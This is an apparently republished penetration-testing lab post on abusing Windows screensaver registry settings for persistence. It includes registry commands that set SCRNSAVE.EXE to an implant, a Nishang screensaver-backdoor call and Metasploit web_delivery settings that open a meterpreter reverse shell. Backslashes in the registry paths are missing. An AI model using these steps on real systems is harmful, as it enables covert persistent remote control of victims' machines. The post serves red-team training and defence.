Home Internet of things Persistence – Screensaver | Penetration Testing Lab

Persistence – Screensaver | Penetration Testing Lab


Persistence – Screensaver

Screensavers are part of Windows functionality and enable users to put a screen message or a graphic animation after a period of inactivity. This feature of Windows it is known to be abused by threat actors as a method of persistence. This is because screensavers are executable files that have the .scr file extension and are executed via the scrnsave.scr utility.

Screensaver settings are stored in the registry and the values that are considered most valuable from an offensive perspective are:

HKEY_CURRENT_USERControl PanelDesktopScreenSaveActive
HKEY_CURRENT_USERControl PanelDesktopScreenSaverIsSecure
HKEY_CURRENT_USERControl PanelDesktopScreenSaveTimeOut
- screensaver registry keys - Persistence – Screensaver | Penetration Testing Lab
Screensaver – Registry Keys

Registry keys can be modified or added via the command prompt or from a PowerShell console. Since the .scr files are essentially executables both extensions can be used to the file that will act as the implant.

reg add "hkcucontrol paneldesktop" /v SCRNSAVE.EXE /d c:tmppentestlab.exe
reg add "hkcucontrol paneldesktop" /v SCRNSAVE.EXE /d c:tmppentestlab.scr
New-ItemProperty -Path 'HKCU:Control PanelDesktop' -Name 'SCRNSAVE.EXE' -Value 'c:tmppentestlab.exe'
New-ItemProperty -Path 'HKCU:Control PanelDesktop' -Name 'SCRNSAVE.EXE' -Value 'c:tmppentestlab.scr'
- screensaver cmd powershell - Persistence – Screensaver | Penetration Testing Lab
Screensaver – Add Registry Key – CMD & PowerShell

Once the period of inactivity is passed the arbitrary payload will executed and a communication will the command and control will established again.

- screensaver meterpreter - Persistence – Screensaver | Penetration Testing Lab
Screensaver – Meterpreter

Nishang framework contains a PowerShell script which can also perform this attack but it requires administrative level privilege compare to method above since it is using a registry key in the local machine to store the PowerShell command that will execute a remotely hosted payload. The benefit from this technique is that it doesn’t touches the disk.

Import-Module .Add-ScrnSaveBackdoor.ps1
Add-ScrnSaveBackdoor -PayloadURL
- nishang screensaver backdoor - Persistence – Screensaver | Penetration Testing Lab
Nishang – Screensaver

Metasploit web delivery module can be used to generate and host the PowerShell payload in this scenario. Once the user session becomes idle the screensaver will execute the PowerShell payload and a meterpreter session will open.

use exploit/multi/script/web_delivery
set payload windows/x64/meterpreter/reverse_tcp
set LHOST IP_Address
set target 2
- screensaver nishang meterpreter - Persistence – Screensaver | Penetration Testing Lab
Meterpreter – Screensaver

The issue with the persistence technique that utilize screensavers is that the session will drop when the user returns back and the system is not in idle mode. However red teams can perform their operations during the absence of the user. If screensavers are disabled by group policy this technique cannot be used for persistence.


Source link

No tags for this post.


Please enter your comment!
Please enter your name here